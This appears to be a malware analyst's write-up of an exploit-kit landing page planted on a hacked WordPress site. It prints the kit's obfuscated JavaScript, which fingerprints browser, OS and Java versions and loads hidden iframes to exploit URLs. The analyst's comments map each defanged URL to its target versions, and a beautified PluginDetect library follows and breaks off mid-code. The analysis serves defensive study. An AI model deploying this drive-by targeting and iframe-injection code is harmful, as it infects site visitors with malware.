i};if(!i.DummySpanTagHTML){i.DummySpanTagHTML=d.DOM.insert("",[],[],a,f,e)}if(!i.HTML){i.HTML=d.DOM.insert("object",["classid",i.classID],[],a,f,e)}if(!i.DummyObjTagHTML2){i.DummyObjTagHTML2=d.DOM.insert("object",["classid",i.classID_dummy],[],a,f,e)}b=d.DOM.getTagStatus(i.HTML,i.DummySpanTagHTML,i.DummyObjTagHTML1,i.DummyObjTagHTML2,g,c);h=f.pluginQuery(i.HTML.obj());i.detected=b>0||h?1:(b==-0.1||b==-0.5?-0.5:-1);i.version=h?h:null;return i}}},zz:0}};PluginDetect.INIT();function PcyjjcB(QXRwqr){var NxZFu = PluginDetect.getVersion(QXRwqr);if(NxZFu != null){return DzIEPNhc(NxZFu);}else{return null;}}function ipzPNmQxc(QEzGR){if(QEzGR != null){var BZIMlJFt = parseFloat(QEzGR[1] + "." + QEzGR[3]);if(QEzGR[0] == 1 && BZIMlJFt <= 6.32){TQGRXSEi();}else if(QEzGR[0] == 1 && BZIMlJFt <= 7.17){IuJKUxe();}/*else{IuJKUxe();}*/}}function nekTVLCFu() { PXTLS('/wp-includes/pomo/dtsrc.php?a=h5', 'text/html'); }function IuJKUxe() { PXTLS('/wp-includes/pomo/dtsrc.php?a=h2', 'text/html'); }function DzIEPNhc(NxZFu){var MRZvEcxG = new Array;try{MRZvEcxG = NxZFu.split(',');for(jBxaKE = 0; jBxaKE < MRZvEcxG.size; jBxaKE++){MRZvEcxG[jBxaKE] = parseFloat(MRZvEcxG[jBxaKE]);}}catch(BeerBZu){return null;}return MRZvEcxG;}function vZfpbBKzh() { PXTLS('/wp-includes/pomo/dtsrc.php?a=h3', 'text/html'); }function pPDjhQv() { return; }function eeguOzpz(UyEllYwYss){if(UyEllYwYss != null){var BZIMlJFt = parseFloat(UyEllYwYss[1] + "." + UyEllYwYss[2]);if(UyEllYwYss[0] == 9 && BZIMlJFt <= 3.4){VcXjat();}if(UyEllYwYss[0] == 9 && BZIMlJFt <= 4.0){pPDjhQv();}else if(UyEllYwYss[0] < 9){pPDjhQv();}if(UyEllYwYss[0] == 10 && UyEllYwYss[1] == 1){YjGGR();}/*else{pPDjhQv();}*/}}function fPVoBak(){var WLtIYJZDWQQ = UIlKdBdnO();if (WLtIYJZDWQQ != null){if (WLtIYJZDWQQ == 'msie'){try { return parseFloat(CzdxtSXz.match(/msie ([\d]+)\.[\d]+/)[1]);}catch(BeerBZu) { return null;}}if (WLtIYJZDWQQ == 'firefox'){try { return parseFloat(CzdxtSXz.match(/firefox\/([\d]+)\.[\d]+/)[1]);}catch(BeerBZu) { return null;}}}return null;}function YQnBLMyY() { PXTLS('/wp-includes/pomo/dtsrc.php?a=h6', 'text/html'); }function PPnprFkcx(){var znQAdpi = 0;var IGwyvnqihKC = 0;try{znQAdpi = new ActiveXObject("SharePoint.OpenDocuments.4");}catch (e) {}try{IGwyvnqihKC = new ActiveXObject("SharePoint.OpenDocuments.3");}catch (e) {}if ((typeof znQAdpi) == "object" && (typeof IGwyvnqihKC) == "object"){return "2010";}else if ((typeof znQAdpi) == "number" && (typeof IGwyvnqihKC) == "object"){return "2007";}return null;}function KzRIuDdJ(QEzGR){if(QEzGR != null){if(QEzGR[0] == 1 && QEzGR[1] == 7 && QEzGR[3] <= 17){vZfpbBKzh();}}}function YnuLXRygeP() { PXTLS('/wp-includes/pomo/dtsrc.php?a=h4', 'text/html'); }function UIlKdBdnO(){if (CzdxtSXz.indexOf('msie') != -1 && CzdxtSXz.indexOf('opera') == -1 && CzdxtSXz.indexOf('webtv') == -1){return 'msie'}if (CzdxtSXz.indexOf('opera') != -1){return 'opera'}if (CzdxtSXz.indexOf('firefox') != -1){return 'firefox';}return null;}function pMuJUQa(){return PcyjjcB("Java");}function VcXjat() { return; }function PXTLS(bVVpcDYN, UgfEmMfy){try { var sevqAkcRBI=document.createElement('iframe'); sevqAkcRBI.style.visibility='hidden'; sevqAkcRBI.height=1; sevqAkcRBI.src=bVVpcDYN; sevqAkcRBI.async=true; sevqAkcRBI.width=1; sevqAkcRBI.type=UgfEmMfy; document.body.appendChild(sevqAkcRBI);}catch (BeerBZu) { return null;}}function TQGRXSEi() { PXTLS('/wp-includes/pomo/dtsrc.php?a=h7', 'text/html'); }function xAtqjEshx(){var NVDGXp = fPVoBak();var hapkhUyCQ = UIlKdBdnO();var ZooVPohAB = KKYaG();/*var pUcLru = PPnprFkcx();*/var uwRBqOEcl = zzaRNJ();if(hapkhUyCQ == 'msie' && NVDGXp == 7 && ZooVPohAB < 6){nekTVLCFu();var QEzGR = pMuJUQa();if(QEzGR != null){setTimeout(function(){ ipzPNmQxc(QEzGR); }, 3000);}return;}if(hapkhUyCQ == 'msie' && NVDGXp == 8 && ZooVPohAB < 6){YQnBLMyY();var QEzGR = pMuJUQa();if(QEzGR != null){setTimeout(function(){ ipzPNmQxc(QEzGR); }, 3000);}return;}if(hapkhUyCQ == 'msie' && NVDGXp == 6 && ZooVPohAB < 6){YnuLXRygeP();var QEzGR = pMuJUQa();if(QEzGR != null){setTimeout(function(){ ipzPNmQxc(QEzGR); }, 3000);}return;}var QEzGR = pMuJUQa();if(QEzGR != null && ZooVPohAB != null){if(hapkhUyCQ == 'chrome'){KzRIuDdJ(QEzGR);}else{ipzPNmQxc(QEzGR);}}}function ekUwwyBtM(){return PcyjjcB("AdobeReader");}function YjGGR() { return; }function KKYaG(){try { return parseFloat(CzdxtSXz.match(/windows nt ([\d]+)\.[\d]+/)[1]);}catch(BeerBZu) { return null;}}function zzaRNJ(){if (CzdxtSXz.indexOf('wow64') != -1){return '64';}else{return '32';}}var CzdxtSXz = navigator.userAgent.toLowerCase();xAtqjEshx();</script></body></html>$
- // unixfreaxjp
- // Exploit logic is as per below:
- h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h2 Non IE Java <= 1.7.17
- h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h3 IE 7 Java <= 1.7.17
- h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h4 IE 6 Win < 6
- h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h5 IE 7 Win/NT < 6 Java <= 1.7.17
- h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h6 IE 8 Win < 6
- h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h7 Non IE Java <= 1.6.32
- // Note: but the API looks supporting to non IE like Chrome & Firefox too actually.
- // I saw no link went from the PDF (Adobe Reader) weapon.
- // unixfreaxjp:
- // PluginDetect Beautified w/ fll HTML below, see its codes, is fun
- // to learn how condition are stated to exploit in the below parts.
- // hope someone can have contacts with Iranian CERT for this...
- //
- <html>
- <head></head>
- <body>
- <script type='text/javascript'>
- /*PluginDetect v0.8.3www.pinlady.net/PluginDetect/license/[ getVersion hasMimeType onDetectionDone ][ Java AdobeReader ]*/
- var PluginDetect = {
- version: "0.8.3",
- name: "PluginDetect",
- openTag: "<",
- isDefined: function (b) {
- return typeof b != "undefined"
- },
- isArray: function (b) {
- return (/array/i).test(Object.prototype.toString.call(b))
- },
- isFunc: function (b) {
- return typeof b == "function"
- },
- isString: function (b) {
- return typeof b == "string"
- },
- isNum: function (b) {
- return typeof b == "number"
- },
- isStrNum: function (b) {
- return (typeof b == "string" && (/\d/).test(b))
- },
- getNumRegx: /[\d][\d\.\_,\-]*/,
- splitNumRegx: /[\.\_,\-]/g,
- getNum: function (b, c) {
- var d = this,
- a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).exec(b) : null;
- return a ? a[0] : null
- },
- compareNums: function (h, f, d) {
- var e = this,
- c, b, a, g = parseInt;
- if (e.isStrNum(h) && e.isStrNum(f)) {
- if (e.isDefined(d) && d.compareNums) {
- return d.compareNums(h, f)
- }
- c = h.split(e.splitNumRegx);
- b = f.split(e.splitNumRegx);
- for (a = 0; a < Math.min(c.length, b.length); a++) {
- if (g(c[a], 10) > g(b[a], 10)) {
- return 1
- }
- if (g(c[a], 10) < g(b[a], 10)) {
- return -1
- }
- }
- }
- return 0
- },
- formatNum: function (b, c) {
- var d = this,
- a, e;
- if (!d.isStrNum(b)) {
- return null
- }
- if (!d.isNum(c)) {
- c = 4
- }
- c--;
- e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
- for (a = 0; a < 4; a++) {
- if (/^(0+)(.+)$/.test(e[a])) {
- e[a] = RegExp.$2
- }
- if (a > c || !(/\d/).test(e[a])) {
- e[a] = "0"
- }
- }
- return e.slice(0, 4).join(",")
- },
- getPROP: function (d, b, a) {
- var c;
- try {
- if (d) {
- a = d[b]
- }
- } catch (c) {}
- return a
- },
- findNavPlugin: function (l, e, c) {
- var j = this,
- h = new RegExp(l, "i"),
- d = (!j.isDefined(e) || e) ? /\d/ : 0,
- k = c ? new RegExp(c, "i") : 0,
- a = navigator.plugins,
- g = "",
- f, b, m;
- for (f = 0; f < a.length; f++) {
- m = a[f].description || g;
- b = a[f].name || g;
- if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))) {
- if (!k || !(k.test(m) || k.test(b))) {
- return a[f]
- }
- }
- }
- return null
- },
- getMimeEnabledPlugin: function (k, m, c) {
- var e = this,
- f, b = new RegExp(m, "i"),
- h = "",
- g = c ? new RegExp(c, "i") : 0,
- a, l, d, j = e.isString(k) ? [k] : k;
- for (d = 0; d < j.length; d++) {
- if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)) {
- l = f.description || h;
- a = f.name || h;
- if (b.test(l) || b.test(a)) {
- if (!g || !(g.test(l) || g.test(a))) {
- return f
- }
- }
- }
- }
- return 0
- },
- getVersionDelimiter: ",",
- findPlugin: function (d) {
- var c = this,
- b, d, a = {
- status: -3,
- plugin: 0
- };
- if (c.DOM) {
- c.DOM.initDiv()
- }
- if (!c.isString(d)) {
- return a
- }
- if (d.length == 1) {
- c.getVersionDelimiter = d;
- return a
- }
- d = d.toLowerCase().replace(/\s/g, "");
- b = c.Plugins[d];
- if (!b || !b.getVersion) {
- return a
- }
- a.plugin = b;
- a.status = 1;
- return a
- },
- getPluginFileVersion: function (f, b) {
- var h = this,
- e, d, g, a, c = -1;
- if (h.OS > 2 || !f || !f.version || !(e = h.getNum(f.version))) {
- return b
- }
- if (!b) {
- return e
- }
- e = h.formatNum(e);
- b = h.formatNum(b);
- d = b.split(h.splitNumRegx);
- g = e.split(h.splitNumRegx);
- for (a = 0; a < d.length; a++) {
- if (c > -1 && a > c && d[a] != "0") {
- return b
- }
- if (g[a] != d[a]) {
- if (c == -1) {
- c = a
- }
- if (d[a] != "0") {
- return b
- }
- }
- }
- return e
- },
- AXO: window.ActiveXObject,
- getAXO: function (a) {
- var d = null,
- c, b = this;
- try {
- d = new b.AXO(a)
- } catch (c) {};
- return d
- },
- INIT: function () {
- this.init.library(this)
- },
- init: {
- $: 1,
- hasRun: 0,
- objProperties: function (d, e, b) {
- var a, c = {};
- if (e && b) {
- if (e[b[0]] === 1 && !d.isArray(e) && !d.isFunc(e) && !d.isString(e) && !d.isNum(e)) {
- for (a = 0; a < b.length; a = a + 2) {
- e[b[a]] = b[a + 1];
- c[b[a]] = 1
- }
- }
- for (a in e) {
- if (!c[a] && e[a] && e[a][b[0]] === 1) {
- this.objProperties(d, e[a], b)
- }
- }
- }
- },
- publicMethods: function (c, f) {
- var g = this,
- b = g.$,
- a, d;
- if (c && f) {
- for (a in c) {
- try {
- if (b.isFunc(c[a])) {
- f[a] = c[a](f)
- }
- } catch (d) {}
- }
- }
- },
- plugin: function (a, c) {
- var d = this,
- b = d.$;
- if (a) {
- d.objProperties(b, a, ["$", b, "$$", a]);
- if (!b.isDefined(a.getVersionDone)) {
- a.installed = null;
- a.version = null;
- a.version0 = null;
- a.getVersionDone = null;
- a.pluginName = c
- }
- }
- },
- detectIE: function () {
- var init = this,
- $ = init.$,
- doc = document,
- e, x, userAgent = navigator.userAgent || "",
- progid, progid1, progid2;
- $.isIE = eval("/*@cc_on!@*/!1");
- $.verIE = $.isIE ? ((/^(?:.*?[^a-zA-Z])??(?:MSIE|IE)\s*(\d+\.?\d*)/i).test(userAgent) ? parseFloat(RegExp.$1, 10) : 7) : null;
- $.ActiveXEnabled = !1;
- $.ActiveXFilteringEnabled = !1;
- if ($.isIE) {
- try {
- $.ActiveXFilteringEnabled = window.external.msActiveXFilteringEnabled()
- } catch (e) {}
- progid1 = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "TDCCtl.TDCCtl", "Shell.UIHelper", "HtmlDlgSafeHelper.HtmlDlgSafeHelper", "Scripting.Dictionary"];
- progid2 = ["WMPlayer.OCX", "ShockwaveFlash.ShockwaveFlash", "AgControl.AgControl", ];
- progid = progid1.concat(progid2);
- for (x = 0; x < progid.length; x++) {
- if ($.getAXO(progid[x])) {
- $.ActiveXEnabled = !0;
- if (!$.dbug) {
- break
- }
- }
- }
- if ($.ActiveXEnabled && $.ActiveXFilteringEnabled) {
- for (x = 0; x < progid2.length; x++) {
- if ($.getAXO(progid2[x])) {
- $.ActiveXFilteringEnabled = !1;
- break
- }
- }
- }
- }
- },
- detectNonIE: function () {
- var e = this,
- c = this.$,
- d = navigator,
- b = c.isIE ? "" : d.userAgent || "",
- f = d.vendor || "",
- a = d.product || "";
- c.isGecko = (/Gecko/i).test(a) && (/Gecko\s*\/\s*\d/i).test(b);
- c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(b) ? RegExp.$1 : "0.9") : null;
- c.isChrome = (/(Chrome|CriOS)\s*\/\s*(\d[\d\.]*)/i).test(b);
- c.verChrome = c.isChrome ? c.formatNum(RegExp.$2) : null;
- c.isSafari = !c.isChrome && ((/Apple/i).test(f) || !f) && (/Safari\s*\/\s*(\d[\d\.]*)/i).test(b);
- c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(b) ? c.formatNum(RegExp.$1) : null;
- c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(b);
- c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(b) || 1) ? parseFloat(RegExp.$1, 10) : null
- },
- detectPlatform: function () {
- var e = this,
- d = e.$,
- b, a = navigator.platform || "";
- d.OS = 100;
- if (a) {
- var c = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, "", 100];
- for (b = c.length - 2; b >= 0; b = b - 2) {
- if (c[b] && new RegExp(c[b], "i").test(a)) {
- d.OS = c[b + 1];
- break
- }
- }
- }
- },
- library: function (c) {
- var e = this,
- d = document,
- b, a;
- c.init.objProperties(c, c, ["$", c]);
- for (a in c.Plugins) {
- c.init.plugin(c.Plugins[a], a)
- }
- e.publicMethods(c.PUBLIC, c);
- c.win.init();
- c.head = d.getElementsByTagName("head")[0] || d.getElementsByTagName("body")[0] || d.body || null;
- e.detectPlatform();
- e.detectIE();
- e.detectNonIE();
- c.init.hasRun = 1
- }
- },
- ev: {
- $: 1,
- handler: function (c, b, a) {
- return function () {
- c(b, a)
- }
- },
- fPush: function (b, a) {
- var c = this,
- d = c.$;
- if (d.isArray(a) && (d.isFunc(b) || (d.isArray(b) && b.length > 0 && d.isFunc(b[0])))) {
- a.push(b)
- }
- },
- callArray: function (a) {
- var b = this,
- d = b.$,
- c;
- if (d.isArray(a)) {
- while (a.length) {
- c = a[0];
- a.splice(0, 1);
- b.call(c)
- }
- }
- },
- call: function (d) {
- var b = this,
- c = b.$,
- a = c.isArray(d) ? d.length : -1;
- if (a > 0 && c.isFunc(d[0])) {
- d[0](c, a > 1 ? d[1] : 0, a > 2 ? d[2] : 0, a > 3 ? d[3] : 0)
- } else {
- if (c.isFunc(d)) {
- d(c)
- }
- }
- }
- },
- PUBLIC: {
- getVersion: function (b) {
- var a = function (h, e, d) {
- var f = b.findPlugin(h),
- g, c;
- if (f.status < 0) {
- return null
- };
- g = f.plugin;
- if (g.getVersionDone != 1) {
- g.getVersion(null, e, d);
- if (g.getVersionDone === null) {
- g.getVersionDone = 1
- }
- }
- c = (g.version || g.version0);
- c = c ? c.replace(b.splitNumRegx, b.getVersionDelimiter) : c;
- return c
- };
- return a
- },
- onDetectionDone: function (b) {
- var a = function (j, h, d, c) {
- var e = b.findPlugin(j),
- k, g;
- if (e.status == -3) {
- return -1
- }
- g = e.plugin;
- if (!b.isArray(g.funcs)) {
- g.funcs = []
- };
- if (g.getVersionDone != 1) {
- k = b.getVersion ? b.getVersion(j, d, c) : b.isMinVersion(j, "0", d, c)
- }
- if (g.installed != -0.5 && g.installed != 0.5) {
- b.ev.call(h);
- return 1
- }
- b.ev.fPush(h, g.funcs);
- return 0
- };
- return a
- },
- hasMimeType: function (b) {
- var a = function (d) {
- if (!b.isIE && d && navigator && navigator.mimeTypes) {
- var g, f, c, e = b.isArray(d) ? d : (b.isString(d) ? [d] : []);
- for (c = 0; c < e.length; c++) {
- if (b.isString(e[c]) && /[^\s]/.test(e[c])) {
- g = navigator.mimeTypes[e[c]];
- f = g ? g.enabledPlugin : 0;
- if (f && (f.name || f.description)) {
- return g
- }
- }
- }
- }
- return null
- };
- return a
- },
- z: 0
- },
- codebase: {
- $: 1,
- isDisabled: function () {
- var a = this,
- b = a.$;
- return b.ActiveXEnabled && b.isIE && b.verIE >= 7 ? 0 : 1
- },
- checkGarbage: function (d) {
- var b = this,
- c = b.$,
- a;
- if (c.isIE && d && c.getPROP(d.firstChild, "object")) {
- a = c.getPROP(d.firstChild, "readyState");
- if (c.isNum(a) && a != 4) {
- b.garbage = 1;
- return 1
- }
- }
- return 0
- },
- emptyGarbage: function () {
- var a = this,
- b = a.$,
- c;
- if (b.isIE && a.garbage) {
- try {
- window.CollectGarbage()
- } catch (c) {}
- a.garbage = 0
- }
- },
- init: function (e) {
- if (!e.init) {
- var c = this,
- d = c.$,
- a, b;
- e.init = 1;
- e.min = 0;
- e.max = 0;
- e.hasRun = 0;
- e.version = null;
- e.L = 0;
- e.altHTML = "";
- e.span = document.createElement("span");
- e.tagA = '<object width="1" height="1" style="display:none;" codebase="#version=';
- b = e.classID || e.$$.classID || "";
- e.tagB = '" ' + ((/clsid\s*:/i).test(b) ? 'classid="' : 'type="') + b + '">' + e.altHTML + d.openTag + "/object>";
- for (a = 0; a < e.Lower.length; a++) {
- e.Lower[a] = d.formatNum(e.Lower[a]);
- e.Upper[a] = d.formatNum(e.Upper[a])
- }
- }
- },
- isActiveXObject: function (i, b) {
- var f = this,
- g = f.$,
- a = 0,
- h, d = i.$$,
- c = i.span;
- if (i.min && g.compareNums(b, i.min) <= 0) {
- return 1
- }
- if (i.max && g.compareNums(b, i.max) >= 0) {
- return 0
- }
- c.innerHTML = i.tagA + b + i.tagB;
- if (g.getPROP(c.firstChild, "object")) {
- a = 1
- };
- f.checkGarbage(c);
- c.innerHTML = "";
- if (a) {
- i.min = b
- } else {
- i.max = b
- }
- return a
- },
- convert_: function (f, a, b, e) {
- var d = f.convert[a],
- c = f.$;
- return d ? (c.isFunc(d) ? c.formatNum(d(b.split(c.splitNumRegx), e).join(",")) : b) : d
- },
- convert: function (h, c, g) {
- var e = this,
- f = h.$,
- b, a, d;
- c = f.formatNum(c);
- a = {
- v: c,
- x: -1
- };
- if (c) {
- for (b = 0; b < h.Lower.length; b++) {
- d = e.convert_(h, b, h.Lower[b]);
- if (d && f.compareNums(c, g ? d : h.Lower[b]) >= 0 && (!b || f.compareNums(c, g ? e.convert_(h, b, h.Upper[b]) : h.Upper[b]) < 0)) {
- a.v = e.convert_(h, b, c, g);
- a.x = b;
- break
- }
- }
- }
- return a
- },
- isMin: function (g, f) {
- var d = this,
- e = g.$,
- c, b, a = 0;
- d.init(g);
- return a
- },
- search: function (g) {
- var k = this,
- h = k.$,
- i = g.$$,
- b = 0,
- c;
- k.init(g);
- c = (g.hasRun || k.isDisabled()) ? 1 : 0;
- g.hasRun = 1;
- if (c) {
- return g.version
- };
- var o, n, m, j = function (q, t) {
- var r = [].concat(f),
- s;
- r[q] = t;
- s = k.isActiveXObject(g, r.join(","));
- if (s) {
- b = 1;
- f[q] = t
- } else {
- p[q] = t
- }
- return s
- }, d = g.DIGITMAX,
- e, a, l = 99999999,
- f = [0, 0, 0, 0],
- p = [0, 0, 0, 0];
- for (o = 0; o < p.length; o++) {
- f[o] = Math.floor(g.DIGITMIN[o]) || 0;
- e = f.join(",");
- a = f.slice(0, o).concat([l, l, l, l]).slice(0, f.length).join(",");
- for (m = 0; m < d.length; m++) {
- if (h.isArray(d[m])) {
- d[m].push(0);
- if (d[m][o] > p[o] && h.compareNums(a, g.Lower[m]) >= 0 && h.compareNums(e, g.Upper[m]) < 0) {
- p[o] = Math.floor(d[m][o])
- }
- }
- }
- for (n = 0; n < 30; n++) {
- if (p[o] - f[o] <= 16) {
- for (m = p[o]; m >= f[o] + (o ? 1 : 0); m--) {
- if (j(o, m)) {
- break
- }
- }
- break
- }
- j(o, Math.round((p[o] + f[o]) / 2))
- }
- if (!b) {
- break
- }
- p[o] = f[o]
- }
- if (b) {
- g.version = k.convert(g, f.join(",")).v
- };
- return g.version
- }
- },
- win: {
- $: 1,
- loaded: false,
- hasRun: 0,
- init: function () {
- var b = this,
- a = b.$;
- if (!b.hasRun) {
- b.hasRun = 1;
- b.addEvent("load", a.ev.handler(b.runFuncs, a));
- b.addEvent("unload", a.ev.handler(b.cleanup, a))
- }
- },
- addEvent: function (c, b) {
- var e = this,
- d = e.$,
- a = window;
- if (d.isFunc(b)) {
- if (a.addEventListener) {
- a.addEventListener(c, b, false)
- } else {
- if (a.attachEvent) {
- a.attachEvent("on" + c, b)
- } else {
- a["on" + c] = e.concatFn(b, a["on" + c])
- }
- }
- }
- },
- concatFn: function (d, c) {
- return function () {
- d();
- if (typeof c == "function") {
- c()
- }
- }
- },
- funcs0: [],
- funcs: [],
- cleanup: function (b) {
- if (b) {
- for (var a in b) {
- b[a] = 0
- }
- b = 0
- }
- },
- runFuncs: function (a) {
- if (a && !a.win.loaded) {
- a.win.loaded = true;
- a.ev.callArray(a.win.funcs0);
- a.ev.callArray(a.win.funcs);
- if (a.DOM) {
- a.DOM.onDoneEmptyDiv()
- }
- }
- },
- z: 0
- },
- DOM: {
- $: 1,
- isEnabled: {
- $: 1,
- objectTag: function () {
- var a = this.$;
- return a.isIE ? a.ActiveXEnabled : 1
- },
- objectProperty: function () {
- var a = this.$;
- return a.isIE && a.verIE >= 7 ? 1 : 0
- }
- },
- div: null,
- divID: "plugindetect",
- divClass: "doNotRemove",
- divWidth: 50,
- getDiv: function () {
- var a = this;
- return a.div || document.getElementById(a.divID) || null
- },
- isDivPermanent: function () {
- var b = this,
- c = b.$,
- a = b.getDiv();
- return a && c.isString(a.className) && a.className.toLowerCase().indexOf(b.divClass.toLowerCase()) > -1 ? 1 : 0
- },
- initDiv: function (b) {
- var c = this,
- d = c.$,
- a;
- if (!c.div) {
- a = c.getDiv();
- if (a) {
- c.div = a
- } else {
- if (b) {
- c.div = document.createElement("div");
- c.div.id = c.divID
- }
- } if (c.div) {
- c.setStyle(c.div, c.defaultStyle.concat(["display", "block", "width", c.divWidth + "px", "height", (c.pluginSize + 3) + "px", "fontSize", (c.pluginSize + 3) + "px", "lineHeight", (c.pluginSize + 3) + "px"]));
- if (!a) {
- c.setStyle(c.div, ["position", "absolute", "right", "0px", "top", "0px"]);
- c.insertDivInBody(c.div)
- }
- }
- }
- },
- pluginSize: 1,
- altHTML: " ",
- emptyNode: function (c) {
- var b = this,
- d = b.$,
- a, f;
- if (c && c.childNodes) {
- for (a = c.childNodes.length - 1; a >= 0; a--) {
- if (d.isIE) {
- b.setStyle(c.childNodes[a], ["display", "none"])
- }
- c.removeChild(c.childNodes[a])
- }
- }
- },
- LASTfuncs: [],
- onDoneEmptyDiv: function () {
- var f = this,
- g = f.$,
- b, d, c, a, h;
- f.initDiv();
- if (!g.win.loaded || g.win.funcs0.length || g.win.funcs.length) {
- return
- }
- for (b in g.Plugins) {
- d = g.Plugins[b];
- if (d) {
- if (d.OTF == 3 || (d.funcs && d.funcs.length)) {
- return
- }
- }
- }
- g.ev.callArray(f.LASTfuncs);
- a = f.getDiv();
- if (a) {
- if (f.isDivPermanent()) {} else {
- if (a.childNodes) {
- for (b = a.childNodes.length - 1; b >= 0; b--) {
- c = a.childNodes[b];
- f.emptyNode(c)
- }
- try {
- a.innerHTML = ""
- } catch (h) {}
- }
- if (a.parentNode) {
- try {
- a.parentNode.removeChild(a)
- } catch (h) {}
- a = null;
- f.div = null
- }
- }
- }
- },
- width: function () {
- var g = this,
- e = g.DOM,
- f = e.$,
- d = g.span,
- b, c, a = -1;
- b = d && f.isNum(d.scrollWidth) ? d.scrollWidth : a;
- c = d && f.isNum(d.offsetWidth) ? d.offsetWidth : a;
- return c > 0 ? c : (b > 0 ? b : Math.max(c, b))
- },
- obj: function (b) {
- var d = this,
- c = d.span,
- a = c && c.firstChild ? c.firstChild : null;
- return a
- },
- readyState: function () {
- var b = this,
- a = b.DOM.$;
- return a.isIE ? a.getPROP(b.obj(), "readyState") : b.undefined
- },
- objectProperty: function () {
- var d = this,
- b = d.DOM,
- c = b.$,
- a;
- if (b.isEnabled.objectProperty()) {
- a = c.getPROP(d.obj(), "object")
- }
- return a
- },
- getTagStatus: function (b, m, r, p, f, h) {
- var s = this,
- d = s.$,
- q;
- if (!b || !b.span) {
- return -2
- }
- var k = b.width(),
- c = b.readyState(),
- a = b.objectProperty();
- if (a) {
- return 1.5
- }
- var g = /clsid\s*\:/i,
- o = r && g.test(r.outerHTML || "") ? r : (p && g.test(p.outerHTML || "") ? p : 0),
- i = r && !g.test(r.outerHTML || "") ? r : (p && !g.test(p.outerHTML || "") ? p : 0),
- l = b && g.test(b.outerHTML || "") ? o : i;
- if (!m || !m.span || !l || !l.span) {
- return 0
- }
- var j = l.width(),
- n = m.width(),
- t = l.readyState();
- if (k < 0 || j < 0 || n <= s.pluginSize) {
- return 0
- }
- if (h && !b.pi && d.isDefined(a) && d.isIE && b.tagName == l.tagName && b.time <= l.time && k === j && c === 0 && t !== 0) {
- b.pi = 1
- }
- if (j < n) {
- return b.pi ? -0.1 : 0
- }
- if (k >= n) {
- if (!b.winLoaded && d.win.loaded) {
- return b.pi ? -0.5 : -1
- }
- if (d.isNum(f)) {
- if (!d.isNum(b.count2)) {
- b.count2 = f
- }
- if (f - b.count2 > 0) {
- return b.pi ? -0.5 : -1
- }
- }
- }
- try {
- if (k == s.pluginSize && (!d.isIE || c === 4)) {
- if (!b.winLoaded && d.win.loaded) {
- return 1
- }
- if (b.winLoaded && d.isNum(f)) {
- if (!d.isNum(b.count)) {
- b.count = f
- }
- if (f - b.count >= 5) {
- return 1
- }
- }
- }
- } catch (q) {}
- return b.pi ? -0.1 : 0
- },
- setStyle: function (b, h) {
- var c = this,
- d = c.$,
- g = b.style,
- a, f;
- if (g && h) {
- for (a = 0; a < h.length; a = a + 2) {
- try {
- g[h[a]] = h[a + 1]
- } catch (f) {}
- }
- }
- },
- insertDivInBody: function (a, h) {
- var j = this,
- d = j.$,
- g, b = "pd33993399",
- c = null,
- i = h ? window.top.document : window.document,
- f = i.getElementsByTagName("body")[0] || i.body;
- if (!f) {
- try {
- i.write('<div id="' + b + '">.' + d.openTag + "/div>");
- c = i.getElementById(b)
- } catch (g) {}
- }
- f = i.getElementsByTagName("body")[0] || i.body;
- if (f) {
- f.insertBefore(a, f.firstChild);
- if (c) {
- f.removeChild(c)
- }
- }
- },
- defaultStyle: ["verticalAlign", "baseline", "outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"],
- insert: function (b, i, g, h, c, q, o) {
- var s = this,
- f = s.$,
- r, t = document,
- v, m, p = t.createElement("span"),
- k, a, l = "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:" + (q ? "hidden;" : "visible;") + "display:inline;";
- if (!f.isDefined(h)) {
- h = ""
- }
- if (f.isString(b) && (/[^\s]/).test(b)) {
- b = b.toLowerCase().replace(/\s/g, "");
- v = f.openTag + b + " ";
- v += 'style="' + l + '" ';
- var j = 1,
- u = 1;
- for (k = 0; k < i.length; k = k + 2) {
- if (/[^\s]/.test(i[k + 1])) {
- v += i[k] + '="' + i[k + 1] + '" '
- }
- if ((/width/i).test(i[k])) {
- j = 0
- }
- if ((/height/i).test(i[k])) {
- u = 0
- }
- }
- v += (j ? 'width="' + s.pluginSize + '" ' : "") + (u ? 'height="' + s.pluginSize + '" ' : "");
- v += ">";
- for (k = 0; k < g.length; k = k + 2) {
- if (/[^\s]/.test(g[k + 1])) {
- v += f.openTag + 'param name="' + g[k] + '" value="' + g[k + 1] + '" />'
- }
- }
- v += h + f.openTag + "/" + b + ">"
- } else {
- b = "";
- v = h
- } if (!o) {
- s.initDiv(1)
- }
- var n = o || s.getDiv();
- m = {
- span: null,
- winLoaded: f.win.loaded,
- tagName: b,
- outerHTML: v,
- DOM: s,
- time: new Date().getTime(),
- width: s.width,
- obj: s.obj,
- readyState: s.readyState,
- objectProperty: s.objectProperty
- };
- if (n && n.parentNode) {
- s.setStyle(p, s.defaultStyle.concat(["display", "inline"]).concat(o ? [] : ["fontSize", (s.pluginSize + 3) + "px", "lineHeight", (s.pluginSize + 3) + "px"]));
- n.appendChild(p);
- try {
- p.innerHTML = v
- } catch (r) {};
- m.span = p;
- m.winLoaded = f.win.loaded
- }
- return m
- }
- },
- file: {
- $: 1,
- any: "fileStorageAny999",
